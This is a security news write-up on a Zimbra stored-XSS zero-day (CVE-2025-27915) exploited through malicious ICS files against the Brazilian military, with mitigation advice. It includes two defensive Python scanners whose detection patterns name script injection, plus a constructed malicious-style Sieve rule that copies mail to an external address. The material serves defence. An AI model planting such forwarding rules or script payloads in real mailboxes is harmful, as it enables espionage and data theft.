Quick Takeaways
- A zero-day in Zimbra (CVE-2025-27915) involving stored XSS was exploited in cyberattacks on the Brazilian military, allowing arbitrary JavaScript execution via malicious ICS files.
- The vulnerability was patched in versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 on January 27, 2025, but was reportedly exploited in the wild beforehand.
- Attackers used malicious ICS files to steal credentials, emails, and contacts, and to insert filters that redirect emails to an external server, with stealthy activity maintained for over three days.
- Multiple threat actors, including Russian group APT28 and others like Winter Vivern, have exploited similar vulnerabilities in webmail solutions for credential theft and espionage.
Underlying Problem
Earlier this year, a significant zero-day security flaw in Zimbra Collaboration, designated CVE-2025-27915, was exploited by unknown cyber threat actors, notably targeting the Brazilian military. The flaw is a stored cross-site scripting (XSS) vulnerability in the Web Client: JavaScript embedded in an ICS calendar file attached to an email ran in the recipient's browser when the email was viewed. Because that script executes inside the victim's authenticated session, the attackers could manipulate email filters, redirect messages, and potentially extract sensitive data. Although Zimbra issued patches for the vulnerability in January 2025, a report from StrikeReady Labs in late September revealed active in-the-wild exploitation, with threat actors posing as the Libyan Navy's Office of Protocol to send the Brazilian military emails carrying malicious ICS files. The JavaScript in these files was designed to steal credentials, emails, contacts, and shared folders, and to add filters that quietly forwarded targeted emails to external servers, while concealing its activity for days to evade detection. The identity of the perpetrators remains uncertain, but previous disclosures by security organizations show that advanced state-sponsored groups, such as Russia's APT28, and other espionage units have exploited similar vulnerabilities across various webmail platforms, pointing to an established pattern of cyber espionage and credential theft campaigns.
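The attack described above hinges on a calendar parser rendering HTML and script carried inside ICS property values. The following added example (not code from the report or from Zimbra) is a small defensive scanner for ICS attachments: it unfolds RFC 5545 line folding and flags any property whose value contains active-content markers. The sample ICS is constructed for illustration.

```python
import re

# Constructed sample ICS attachment (not from the incident): one property
# carries HTML with an inline script element, content no calendar client
# should ever render as markup.
SAMPLE_ICS = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//example//constructed//EN
BEGIN:VEVENT
UID:constructed-0001@example.invalid
SUMMARY:Protocol meeting
DESCRIPTION:Agenda attached.
X-ALT-DESC;FMTTYPE=text/html:<html><body>Agenda<script>/* constructed */
 </script></body></html>
END:VEVENT
END:VCALENDAR
"""

# Indicators of active HTML content inside a text-valued property.
SUSPICIOUS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler-attr", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("embedded-frame-or-object", re.compile(r"<\s*(iframe|object|embed)\b", re.I)),
]

def unfold(ics_text):
    """Join RFC 5545 folded lines: a line starting with SPACE or HTAB continues the previous one."""
    lines = []
    for raw in ics_text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return [line for line in lines if line]

def scan_ics(ics_text):
    """Return (property_name, indicator) pairs for every property whose value looks like active HTML."""
    findings = []
    for line in unfold(ics_text):
        # Split on the first colon; parameters with quoted colons are rare and not handled here.
        name, sep, value = line.partition(":")
        if not sep:
            continue
        prop = name.split(";", 1)[0].upper()  # drop parameters such as FMTTYPE=text/html
        for label, pattern in SUSPICIOUS:
            if pattern.search(value):
                findings.append((prop, label))
    return findings

if __name__ == "__main__":
    print(scan_ics(SAMPLE_ICS))
```

A gateway check of this kind is a complement to patching, not a substitute: it flags the attachment before a vulnerable client ever parses it.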
Risks Involved
Cyber risks, exemplified by recent exploits targeting Zimbra Collaboration, highlight the persistent threat of sophisticated vulnerabilities, such as zero-day cross-site scripting (XSS) flaws, which can be exploited to execute arbitrary code in a victim's session, manipulate emails, exfiltrate sensitive data, and establish unauthorized control over victim accounts. These attacks—often orchestrated by state-sponsored or advanced persistent threat (APT) groups like APT28, Winter Vivern, and UNC1151—are typically concealed through obfuscated code and deliberately delayed activity, making detection difficult and enabling prolonged access. Even after vulnerabilities are patched, actors continue to target deployments that have not applied the fix and pair the exploit with impersonation and social engineering, resulting in significant impacts including data breaches, operational disruption, and compromised national security, particularly when the targets are military or governmental institutions. The evolving threat landscape underscores the critical need for rigorous security protocols, timely updates, and vigilant monitoring to mitigate these persistent and potentially devastating cyber risks.
Possible Next Steps
In an era where cyber threats evolve rapidly, the timely remediation of vulnerabilities like the Zimbra zero-day exploited to target the Brazilian military via malicious ICS files is crucial. Addressing such exploits swiftly minimizes potential damage, safeguards sensitive information, and maintains operational integrity.
Mitigation Measures:
- Immediate deployment of the latest security patches and updates for Zimbra.
- Block or restrict email attachments from unknown or untrusted sources, especially ICS files.
- Implement robust email filtering and malware scanning to detect malicious content.
- Enforce strict user access controls and monitor unusual activity patterns.
Remediation Steps:
- Conduct a comprehensive security audit to identify compromised systems.
- Isolate affected servers and devices to prevent further spread.
- Remove malicious files and malicious code from infected systems.
- Reset passwords and review user access privileges.
- Notify relevant authorities and stakeholders about the breach.
- Develop and distribute updated security policies and training to mitigate future exploits.
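The security audit above should include each mailbox's filter rules, since the campaign planted filters that forward mail to an external server. Zimbra stores per-user mail filters as Sieve scripts; the following added example (not code from the report or from Zimbra) parses a Sieve script and reports every redirect whose target domain is outside the organisation, including `:copy` redirects that leave the original message in place. The sample script and the domain list are constructed.

```python
import re

# Constructed Sieve script (not from the incident) of the shape an injected
# rule would take: copy selected mail to an outside mailbox while keeping the
# original so the victim notices nothing.
SAMPLE_SIEVE = '''require ["fileinto", "copy"];
# Auto-generated filter
if header :contains "subject" "report" {
    fileinto "Reports";
}
if anyof(header :contains "from" "finance", header :contains "subject" "protocol") {
    redirect :copy "collector@mail.example.invalid";
}
if header :contains "subject" "newsletter" {
    redirect "me@corp.example";
}
'''

# Matches: redirect [:tag ...] "address"  (RFC 5228 redirect, RFC 3894 :copy)
REDIRECT = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"')

def audit_sieve(script, internal_domains):
    """Return (target, tags) for every redirect whose target domain is not an internal domain.

    Parsing is line-based, so a redirect action split across lines is not matched;
    comment lines are skipped.
    """
    internal = {d.lower() for d in internal_domains}
    findings = []
    for line in script.splitlines():
        if line.lstrip().startswith("#"):
            continue
        for match in REDIRECT.finditer(line):
            tags, target = match.group(1).split(), match.group(2)
            domain = target.rpartition("@")[2].lower()
            if domain not in internal:
                findings.append((target, tags))
    return findings

if __name__ == "__main__":
    for target, tags in audit_sieve(SAMPLE_SIEVE, ["corp.example"]):
        print("external redirect:", target, "tags:", tags)
```

Run the check against every account's filter script and compare the results with the previous audit: a redirect that appeared without a user request is a strong indicator of account compromise.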
